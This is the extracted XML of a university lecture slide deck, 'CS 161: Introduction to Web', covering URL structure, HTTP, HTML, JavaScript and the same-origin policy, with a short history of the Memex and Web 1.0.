          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="369450" y="3604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toon.cs161.org</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="558" name="Google Shape;558;p70"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3488250" y="3572000"/>
            <a:ext cx="30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559" name="Google Shape;559;p70"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6564750" y="3493025"/>
            <a:ext cx="240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Domain mismatch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toon.cs161.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ≠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100"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="560" name="Google Shape;560;p70"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426375" y="4226925"/>
            <a:ext cx="30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http://toon.cs161.org[:</a:t>
            </a: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561" name="Google Shape;561;p70"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3563800" y="4230825"/>
            <a:ext cx="3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http://toon.cs161.org:</a:t>
            </a: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000">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="562" name="Google Shape;562;p70"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6563800" y="4123125"/>
            <a:ext cx="240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 mismatch</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
            </a:b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>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ≠ </a:t>
            </a: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68" name="Google Shape;568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websites with different origins cannot interact with each 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/>
              <a:t> embeds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r>
              <a:rPr lang="en"/>
              <a:t>, the inner frame cannot interact with the outer frame, and the outer frame cannot interact with the inner-frame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JavaScript runs with the origin of the page that loads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/>
              <a:t> fetches JavaScript from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r>
              <a:rPr lang="en"/>
              <a:t>, the JavaScript has the origin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/>
              <a:t> has “copy-pasted” JavaScript onto its webpage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Websites can fetch and display images from other origins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 website only knows about the image’s size and dimensions (cannot actually manipulate the image)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Websites can agree to allow some limited sharing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Cross-origin resource sharing (CORS)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postMessage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> function in JavaScript</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="569" name="Google Shape;569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URLs: Summary</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="575" name="Google Shape;575;p7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URL: A string that uniquely identifies one piece of data on the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a URL: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Protocol: Defines which Internet protocol to use to retrieve the data (e.g. HTTP or HTTPS)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Location: Defines which web server to contact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optionally contain a username or port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Path: Defines which file on the web server to fetch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 (optional): Sends arguments in name-value pairs to the web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Fragment (optional): Not sent to the web server, but used by the browser for processing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characters should be URL escaped</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="576" name="Google Shape;576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 Summary</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="582" name="Google Shape;582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 A protocol used to request and retrieve data from a web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 A secure version of HTTP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is a request-response protocol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 (GET or POST)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 path and query parameters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(only for POST requests)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Status code: A number indicating what happened with the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Headers: Metadata about the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</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="583" name="Google Shape;583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Webpage: Summary</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="589" name="Google Shape;589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HTML: A markup language to create structured documents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link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form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 an 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 another webpage (iframe or frame)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powerful as JavaScript if used maliciously!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JavaScript: A programming language for running code in the web browser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code runs in the web browser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any part of the webpage (e.g. HTML or CSS)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pop-up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HTTP requests</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="590" name="Google Shape;59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Policy: Summary</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="596" name="Google Shape;596;p7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 enforced by the browser: Two websites with different origins cannot interact with each other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webpages have the same origin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" i="1"/>
              <a:t>if and only if</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> the protocol, domain, and port of the URL all match exactly (string matching)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runs with the origin of the page that loads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Websites can fetch and display images from other origins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Websites can agree to allow some limited sharing</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="597" name="Google Shape;59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Memex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Microfilm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Microfilm: Printing documents in extremely small text and reading it with a special viewer that magnified the text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most compact storage available before computers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microfiche card (a 100mm x 148mm piece of film) can hold 100 pages of text!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1945: We need a conceptual way to organize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reference library has a lot of information, but how do you reliably find a piece of data?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Memex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Developed by Vannevar Bush, head of the primary military R&amp;D (research &amp; development) office during World War II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Memex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Memex: A large, integrated desk for storing and accessing microfilm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Trails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piece of data is referred to with a unique identifier, called a “trail”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Following a trail: given a trail, you can find the corresponding piece of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create your own custom “personal trails”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Modern web: implemented as URLs and hyperlinks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Uploading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your own data and use a photographic hood to add it to the Memex collection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 can access data you uploaded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Modern web: You can create websites that everyone else can access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Legacy of Memex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physical Memex was never built, but its ideas influenced web design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Memex was only designed for accessing data, not code!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1.0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1.0: The first era of websites (roughly 1991-2004)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Websites only contained static content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Documents with texts, images, etc.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interactive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1996: Sun Microsystems releases Java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Java: A programming language designed to compile to an intermediate representation and run on a lot of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Sun Microsystems built a web browser that can fetch and execute Java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Java was too powerful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was designed to do everything a locally running program could do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vulnerabilities associated with downloading and running code from others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new language called JavaScript was created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only things JavaScript and Java share are the name and some parts of the syntax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Web?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4061</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>On-screen Show (16:9)</PresentationFormat>
  <Paragraphs>539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Courier New</vt:lpstr>
      <vt:lpstr>CS 161</vt:lpstr>
      <vt:lpstr>Introduction to Web</vt:lpstr>
      <vt:lpstr>Announcements</vt:lpstr>
      <vt:lpstr>Today: Introduction to Web</vt:lpstr>
      <vt:lpstr>A Brief History of the Web</vt:lpstr>
      <vt:lpstr>A Brief History of the Web</vt:lpstr>
      <vt:lpstr>Memex</vt:lpstr>
      <vt:lpstr>Memex</vt:lpstr>
      <vt:lpstr>Web 1.0</vt:lpstr>
      <vt:lpstr>What’s the Web?</vt:lpstr>
      <vt:lpstr>What’s the Web?</vt:lpstr>
      <vt:lpstr>Today: Elements of the Web</vt:lpstr>
      <vt:lpstr>URLs</vt:lpstr>
      <vt:lpstr>Today: Elements of the Web</vt:lpstr>
      <vt:lpstr>URLs</vt:lpstr>
      <vt:lpstr>Parts of a URL: Scheme</vt:lpstr>
      <vt:lpstr>Parts of a URL: Domain</vt:lpstr>
      <vt:lpstr>Parts of a URL: Location</vt:lpstr>
      <vt:lpstr>Parts of a URL: Path</vt:lpstr>
      <vt:lpstr>Parts of a URL: Query</vt:lpstr>
      <vt:lpstr>Parts of a URL: Fragment</vt:lpstr>
      <vt:lpstr>URL Escaping</vt:lpstr>
      <vt:lpstr>A Simplified View of the Web</vt:lpstr>
      <vt:lpstr>A Simplified View of the Web</vt:lpstr>
      <vt:lpstr>A Simplified View of the Web</vt:lpstr>
      <vt:lpstr>HTTP</vt:lpstr>
      <vt:lpstr>Today: Elements of the Web</vt:lpstr>
      <vt:lpstr>HTTP</vt:lpstr>
      <vt:lpstr>Parts of an HTTP Request</vt:lpstr>
      <vt:lpstr>Parts of an HTTP Response</vt:lpstr>
      <vt:lpstr>Parts of a Webpage</vt:lpstr>
      <vt:lpstr>Today: Elements of the Web</vt:lpstr>
      <vt:lpstr>HTML</vt:lpstr>
      <vt:lpstr>Features of HTML: Create a Link</vt:lpstr>
      <vt:lpstr>Features of HTML: Create a Form</vt:lpstr>
      <vt:lpstr>Features of HTML: Embed an Image</vt:lpstr>
      <vt:lpstr>Features of HTML: Embed Another Webpage</vt:lpstr>
      <vt:lpstr>CSS</vt:lpstr>
      <vt:lpstr>JavaScript</vt:lpstr>
      <vt:lpstr>JavaScript Fact Sheet</vt:lpstr>
      <vt:lpstr>Vulnerabilities in the JavaScript interpreter/compiler</vt:lpstr>
      <vt:lpstr>Features of JavaScript</vt:lpstr>
      <vt:lpstr>Features of JavaScript</vt:lpstr>
      <vt:lpstr>Features of JavaScript</vt:lpstr>
      <vt:lpstr>Rendering a Webpage</vt:lpstr>
      <vt:lpstr>Security on the Web</vt:lpstr>
      <vt:lpstr>Risks on the Web</vt:lpstr>
      <vt:lpstr>Risks on the Web</vt:lpstr>
      <vt:lpstr>Risks on the Web</vt:lpstr>
      <vt:lpstr>Same-Origin Policy</vt:lpstr>
      <vt:lpstr>Same-Origin Policy: Definition</vt:lpstr>
      <vt:lpstr>Same-Origin Policy</vt:lpstr>
      <vt:lpstr>Same-Origin Policy</vt:lpstr>
      <vt:lpstr>Same-Origin Policy</vt:lpstr>
      <vt:lpstr>URLs: Summary</vt:lpstr>
      <vt:lpstr>HTTP: Summary</vt:lpstr>
      <vt:lpstr>Parts of a Webpage: Summary</vt:lpstr>
      <vt:lpstr>Same-Origin Policy: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</dc:title>
  <cp:lastModifiedBy>Jian Xiang</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-10-04T12:33:07Z</dcterms:modified>
</cp:coreProperties>
</file>